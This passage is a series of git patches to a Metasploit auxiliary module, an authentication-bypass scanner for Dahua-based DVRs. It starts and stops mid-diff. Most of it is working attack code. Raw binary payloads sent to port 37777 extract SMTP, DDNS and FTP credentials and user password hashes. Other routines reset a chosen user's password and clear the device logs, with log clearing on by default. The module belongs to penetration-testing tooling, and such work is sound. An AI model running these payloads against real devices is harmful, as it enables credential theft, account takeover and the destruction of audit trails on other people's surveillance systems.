[true, 'A password to reset the user with', 'abc123']), + OptString.new('USERNAME', [false, 'A username to reset', '888888']), + OptString.new('PASSWORD', [false, 'A password to reset the user with']), OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), Opt::RPORT(37777) - ], self.class) + ]) + end + + def setup + @password = datastore['PASSWORD'] + @password ||= Rex::Text.rand_text_alpha(6) end def run_host(ip) @@ -195,7 +200,7 @@ class Metasploit3 < Msf::Auxiliary data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } end if datastore['RESET'] - userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + ":" + datastore['PASSWORD'] + userstring = datastore['USERNAME'] + ":Intel:" + @password + ":" + @password u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ From 5e9a0ab3ff72d461b57cec9639ac536efcbe9f91 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 1 Dec 2015 10:57:16 -0500 Subject: [PATCH 020/686] removed version var in initialize method --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 1c2f034e52..ee977219f6 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -6,7 +6,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => %q(Dahua DVR Auth Bypass Scanner), - 'Version' => '$Revision: 1.1 $', 'Description' => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs), 'Author' => [ 'Jake Reynolds - Depth Security', # Vulnerability Discoverer From 36f48dc945ff5bc15c56be20456769a2eecd7db1 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 1 Dec 2015 11:02:14 -0500 Subject: [PATCH 021/686] cleaned up required opts, only left needed vars to run the rest are optional based on user preference --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index ee977219f6..b95a15c239 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary register_options([ OptString.new('USERNAME', [false, 'A username to reset', '888888']), OptString.new('PASSWORD', [false, 'A password to reset the user with']), - OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), - OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), + OptBool.new('RESET', [false, 'Reset an existing user\'s pw?', 'FALSE']), + OptBool.new('CLEAR_LOGS', [false, 'Clear the DVR logs when we\'re done?', 'TRUE']), Opt::RPORT(37777) ]) end From ca496a376fdd579b3e13fff8fb19c32bd9585bb4 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Wed, 2 Dec 2015 14:16:36 -0500 Subject: [PATCH 022/686] set username as a requirement and added note about randomly assinged password for user if not set --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index b95a15c239..d9a5ea0bc1 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Auxiliary ) deregister_options('RHOST') register_options([ - OptString.new('USERNAME', [false, 'A username to reset', '888888']), - OptString.new('PASSWORD', [false, 'A password to reset the user with']), + OptString.new('USERNAME', [true, 'A username to reset', '888888']), + OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']), OptBool.new('RESET', [false, 'Reset an existing user\'s pw?', 'FALSE']), OptBool.new('CLEAR_LOGS', [false, 'Clear the DVR logs when we\'re done?', 'TRUE']), Opt::RPORT(37777) From a8887e6b77611e62916a3a2a045c3127fbde5fce Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Wed, 2 Dec 2015 16:33:09 -0500 Subject: [PATCH 023/686] firts iteration of moving each payload to its own function and setting optional vars, cleaning up rubocop warnings as well --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 404 +++++++++++------- 1 file changed, 238 insertions(+), 166 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index d9a5ea0bc1..e65f12a57a 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -21,83 +21,83 @@ class Metasploit3 < Msf::Auxiliary register_options([ OptString.new('USERNAME', [true, 'A username to reset', '888888']), OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']), + OptBool.new('VERSION_INFO', ['false', 'Grabs the version of DVR', 'FALSE']), + OptBool.new('EMAIL_INFO', ['false', 'Grabs the email settings of the DVR', 'TRUE']), + OptBool.new('DDNS_INFO', ['false', 'Grabs the DDNS settings of the DVR', 'TRUE']), + OptBool.new('SN_INFO', ['false', 'Grabs the SN of the DVR', 'FALSE']), + OptBool.new('CHANNEL_INFO', ['false', 'Grabs the cameras and their assigned name', 'FALSE']), + OptBool.new('NAS_INFO', ['false', 'Grabs the NAS settings of the DVR','TRUE']), + OptBool.new('USER_INFO', ['false', 'Grabs the Users and hashes of the DVR', 'TRUE']), + OptBool.new('GROUP_INFO', ['false', 'Grabs the Users and groups of the DVR', 'FALSE']), OptBool.new('RESET', [false, 'Reset an existing user\'s pw?', 'FALSE']), OptBool.new('CLEAR_LOGS', [false, 'Clear the DVR logs when we\'re done?', 'TRUE']), Opt::RPORT(37777) ]) end + U1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + DVR_RESP = "\xb1\x00\x00\x58\x00\x00\x00\x00" + VERSION = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + EMAIL = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + DDNS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + NAS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + CHANNELS = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + GROUPS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + USERS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + CLEAR_LOGS1 = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + def setup @password = datastore['PASSWORD'] @password ||= Rex::Text.rand_text_alpha(6) end - def run_host(ip) - usercount = 0 - u1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - dvr_resp = "\xb1\x00\x00\x58\x00\x00\x00\x00" - version = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - email = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ - "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - ddns = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ - "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - nas = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ - "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - channels = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ - "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - groups = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - users = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - sn = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - clear_logs = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - clear_logs2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - - user = "root" - pass = " w" - # user8pwhash = "4WzwxXxM" #888888 - # user6pwhash = "sh15yfFM" #666666 - # useradminpwhash = "6QNMIQGe" #admin + def grab_version connect - sock.put(u1) - data = sock.recv(8) - disconnect - if data == dvr_resp - print_good("DVR FOUND: @ #{rhost}:#{rport}!") - report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") - connect - sock.put(version) - data = sock.get(1024) - if data =~ /[\x00]{8,}([[:print:]]+)/ - ver = Regexp.last_match[1] - print_status("Version: #{ver} @ #{rhost}:#{rport}!") - end + sock.put(VERSION) + data = sock.get(1024) + if data =~ /[\x00]{8,}([[:print:]]+)/ + ver = Regexp.last_match[1] + print_status("Version: #{ver} @ #{rhost}:#{rport}!") + end + end - sock.put(sn) - data = sock.get(1024) - if data =~ /[\x00]{8,}([[:print:]]+)/ - serial = Regexp.last_match[1] - print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") - end - connect - sock.put(email) - if data = sock.get(1024).split('&&') - print_status("Email Settings: @ #{rhost}:#{rport}!") - if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ - if mailhost = Regexp.last_match[1].split(':') - print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? - print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? - end + def grab_sn + sock.put(SN) + data = sock.get(1024) + if data =~ /[\x00]{8,}([[:print:]]+)/ + serial = Regexp.last_match[1] + print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") + end + end + + def grab_email + connect + sock.put(EMAIL) + if data = sock.get(1024).split('&&') + print_status("Email Settings: @ #{rhost}:#{rport}!") + if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ + if mailhost = Regexp.last_match[1].split(':') + print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? + print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? + end if !data[5].nil? && !data[6].nil? - print_good(" SMTP User: #{data[5]}") unless data[5].nil? - print_good(" SMTP Password: #{data[6]}") unless data[6].nil? + print_good(" SMTP User: #{data[5]}") unless data[5].nil? + print_good(" SMTP Password: #{data[6]}") unless data[6].nil? muser = "#{data[5]}" mpass = "#{data[6]}" mailserver = "#{mailhost[0]}" @@ -106,129 +106,201 @@ class Metasploit3 < Msf::Auxiliary report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? end end - end end - connect - sock.put(ddns) - if data = sock.get(1024) - data = data.split(/&&[0-1]&&/) - data.each_with_index do |val, index| - if index > 0 - val = val.split("&&") - ddns_service = "#{val[0]}" - ddns_server = "#{val[1]}" - ddns_port = "#{val[2]}" - ddns_domain = "#{val[3]}" - ddns_user = "#{val[4]}" - ddns_pass = "#{val[5]}" - print_status("DDNS Settings @ #{rhost}:#{rport}!:") - print_status(" DDNS Service: #{ddns_service}") unless val.nil? - print_status(" DDNS Server: #{ddns_server}") unless val.nil? - print_status(" DDNS Port: #{ddns_port}") unless val.nil? - print_status(" Domain: #{ddns_domain}") unless val.nil? - print_good(" Username: #{ddns_user}") unless val.nil? - print_good(" Password: #{ddns_pass}") unless val.nil? - if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 + end + end - report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) - end + def grab_ddns + connect + sock.put(DDNS) + if data = sock.get(1024) + data = data.split(/&&[0-1]&&/) + data.each_with_index do |val, index| + if index > 0 + val = val.split("&&") + ddns_service = "#{val[0]}" + ddns_server = "#{val[1]}" + ddns_port = "#{val[2]}" + ddns_domain = "#{val[3]}" + ddns_user = "#{val[4]}" + ddns_pass = "#{val[5]}" + print_status("DDNS Settings @ #{rhost}:#{rport}!:") + print_status(" DDNS Service: #{ddns_service}") unless val.nil? + print_status(" DDNS Server: #{ddns_server}") unless val.nil? + print_status(" DDNS Port: #{ddns_port}") unless val.nil? + print_status(" Domain: #{ddns_domain}") unless val.nil? + print_good(" Username: #{ddns_user}") unless val.nil? + print_good(" Password: #{ddns_pass}") unless val.nil? + if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 + report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end end end - connect - sock.put(nas) - if data = sock.get(1024) - print_status("Nas Settings @ #{rhost}:#{rport}!:") - server = '' - port = '' - if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ - server = Regexp.last_match[1].unpack('C*').join('.') - port = Regexp.last_match[2].unpack('S') - print_status(" Nas Server #{server}") - print_status(" Nas Port: #{port}") - end - if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ - ftpuser = Regexp.last_match[1] - ftppass = Regexp.last_match[2] - print_good(" FTP User: #{ftpuser}") - print_good(" FTP Password: #{ftppass}") - if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 - report_creds(host: server, port: port, user: ftpuser, pass: ftppass, type: "FTP", - active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? - end + end + end + + def grab_nas + connect + sock.put(NAS) + if data = sock.get(1024) + print_status("Nas Settings @ #{rhost}:#{rport}!:") + server = '' + port = '' + if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ + server = Regexp.last_match[1].unpack('C*').join('.') + port = Regexp.last_match[2].unpack('S') + print_status(" Nas Server #{server}") + print_status(" Nas Port: #{port}") + end + if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ + ftpuser = Regexp.last_match[1] + ftppass = Regexp.last_match[2] + print_good(" FTP User: #{ftpuser}") + print_good(" FTP Password: #{ftppass}") + if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 + report_creds( + host: server, + port: port, + user: ftpuser, + pass: ftppass, + type: "FTP", + active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? end end - connect - sock.put(channels) - data = sock.get(1024).split('&&') - disconnect - if data.length > 1 - print_status("Camera Channels @ #{rhost}:#{rport}!:") - data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } + end + end + + def grab_channels + connect + sock.put(CHANNELS) + data = sock.get(1024).split('&&') + disconnect + if data.length > 1 + print_status("Camera Channels @ #{rhost}:#{rport}!:") + data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } + end + end + + def grab_users + usercount = 0 + connect + sock.put(USERS) + if data = sock.get(1024).split('&&') + print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") + data.each do |val| + usercount += 1 + pass = "#{val[/(([\d]+)[:]([0-9A-Za-z]+)[:]([0-9A-Za-z]+))/]}" + value = pass.split(":") + user = "#{value[1]}" + md5hash = "#{value[2]}" + print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") + # Write the dahua hash to the database + hash = "#{rhost} #{user}:$dahua$#{md5hash}" + report_hash(rhost, rport, user, hash) + # Write the vulnerability to the database + report_vuln( + host: rhost, + port: rport, + proto: 'tcp', + sname: 'dvr', + name: 'Dahua Authentication Password Hash Exposure', + info: "Obtained password hash for user #{user}: #{md5hash}", + refs: references + ) end - connect - sock.put(users) - if data = sock.get(1024).split('&&') - print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") - data.each do |val| - usercount += 1 - pass = "#{val[/(([\d]+)[:]([0-9A-Za-z]+)[:]([0-9A-Za-z]+))/]}" - value = pass.split(":") - username = "#{value[1]}" - md5hash = "#{value[2]}" - print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") - # Write the dahua hash to the database - hash = "#{rhost} #{username}:$dahua$#{md5hash}" - report_hash(ip, rport, user, hash) - # Write the vulnerability to the database - report_vuln( - host: rhost, - port: rport, - proto: 'tcp', - sname: 'dvr', - name: 'Dahua Authentication Password Hash Exposure', - info: "Obtained password hash for user #{username}: #{md5hash}", - refs: references - ) - end + end + end + + def grab_groups + connect + sock.put(GROUPS) + if data = sock.get(1024).split('&&') + print_status("User Groups: @ #{rhost}:#{rport}!") + data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } + end + end + + def reset_user + userstring = datastore['USERNAME'] + ":Intel:" + @password + ":" + @password + u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring + sock.put(u1) + sock.put(u2) + sock.put(u3) + data = sock.get(1024) + sock.put(u1) + if data = sock.get(1024) + print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") + end + end + + def clear_logs + sock.put(CLEAR_LOGS1) + sock.put(CLEAR_LOGS2) + print_good("LOGS CLEARED! @ #{rhost}:#{rport}") + end + + def run_host(ip) + # user8pwhash = "4WzwxXxM" #888888 + # user6pwhash = "sh15yfFM" #666666 + # useradminpwhash = "6QNMIQGe" #admin + connect + sock.put(U1) + data = sock.recv(8) + disconnect + if data == DVR_RESP + print_good("DVR FOUND: @ #{rhost}:#{rport}!") + report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") + # needs boolean logic to run or not run + if datastore['VERSION_INFO'] + grab_version end - connect - sock.put(groups) - if data = sock.get(1024).split('&&') - print_status("User Groups: @ #{rhost}:#{rport}!") - data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } + # needs boolean logic to run or not run + if datastore['SN_INFO'] + grab_sn + end + # needs boolean logic to run or not run + if datastore['EMAIL_INFO'] + grab_email + end + # needs boolean logic to run or not run + if datastore['DDNS_INFO'] + grab_ddns + end + # needs boolean logic to run or not run + if datastore['NAS_INFO'] + grab_nas + end + # needs boolean logic to run or not run + if datastore['CHANNEL_INFO'] + grab_channels + end + # needs boolean logic to run or not run + if datastore['USER_INFO'] + grab_users + end + # needs boolean logic to run or not run + if datastore['GROUP_INFO'] + grab_groups end if datastore['RESET'] - userstring = datastore['USERNAME'] + ":Intel:" + @password + ":" + @password - u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring - sock.put(u1) - sock.put(u2) - sock.put(u3) - data = sock.get(1024) - sock.put(u1) - if data = sock.get(1024) - print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") - end - + reset_user end if datastore['CLEAR_LOGS'] - sock.put(clear_logs) - sock.put(clear_logs2) - print_good("LOGS CLEARED! @ #{rhost}:#{rport}") + clear_logs end disconnect end end - def report_hash(ip, rport, user, hash) + def report_hash(rhost, rport, user, hash) service_data = { - address: ip, + address: rhost, port: rport, service_name: 'dahua_dvr', protocol: 'tcp', From 0d89dde4a63fb85d1d532348428f5957949830c2 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Thu, 3 Dec 2015 12:51:48 -0500 Subject: [PATCH 024/686] changed sock.get to sock.get_once and fixed booleans hopefully. Still cleaning things up but its getting closer --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 45 +++++++++++-------- 1 file changed, 26 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index e65f12a57a..e7a4263db9 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -22,15 +22,15 @@ class Metasploit3 < Msf::Auxiliary OptString.new('USERNAME', [true, 'A username to reset', '888888']), OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']), OptBool.new('VERSION_INFO', ['false', 'Grabs the version of DVR', 'FALSE']), - OptBool.new('EMAIL_INFO', ['false', 'Grabs the email settings of the DVR', 'TRUE']), - OptBool.new('DDNS_INFO', ['false', 'Grabs the DDNS settings of the DVR', 'TRUE']), + OptBool.new('EMAIL_INFO', ['false', 'Grabs the email settings of the DVR', 'FALSE']), + OptBool.new('DDNS_INFO', ['false', 'Grabs the DDNS settings of the DVR', 'FALSE']), OptBool.new('SN_INFO', ['false', 'Grabs the SN of the DVR', 'FALSE']), OptBool.new('CHANNEL_INFO', ['false', 'Grabs the cameras and their assigned name', 'FALSE']), - OptBool.new('NAS_INFO', ['false', 'Grabs the NAS settings of the DVR','TRUE']), - OptBool.new('USER_INFO', ['false', 'Grabs the Users and hashes of the DVR', 'TRUE']), + OptBool.new('NAS_INFO', ['false', 'Grabs the NAS settings of the DVR', 'FALSE']), + OptBool.new('USER_INFO', ['true', 'Grabs the Users and hashes of the DVR', 'TRUE']), OptBool.new('GROUP_INFO', ['false', 'Grabs the Users and groups of the DVR', 'FALSE']), - OptBool.new('RESET', [false, 'Reset an existing user\'s pw?', 'FALSE']), - OptBool.new('CLEAR_LOGS', [false, 'Clear the DVR logs when we\'re done?', 'TRUE']), + OptBool.new('RESET', [false, %q(Reset an existing user's pw?), 'FALSE']), + OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), 'TRUE']), Opt::RPORT(37777) ]) end @@ -38,24 +38,33 @@ class Metasploit3 < Msf::Auxiliary U1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" DVR_RESP = "\xb1\x00\x00\x58\x00\x00\x00\x00" + # Payload to grab version of the DVR VERSION = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab Email Settings of the DVR EMAIL = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab DDNS Settings of the DVR DDNS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab NAS Settings of the DVR NAS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Channels that each camera is assigned to on the DVR CHANNELS = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Users Groups of the DVR GROUPS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Users and their hashes from the DVR USERS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Serial Number of the DVR SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to clear the logs of the DVR CLEAR_LOGS1 = 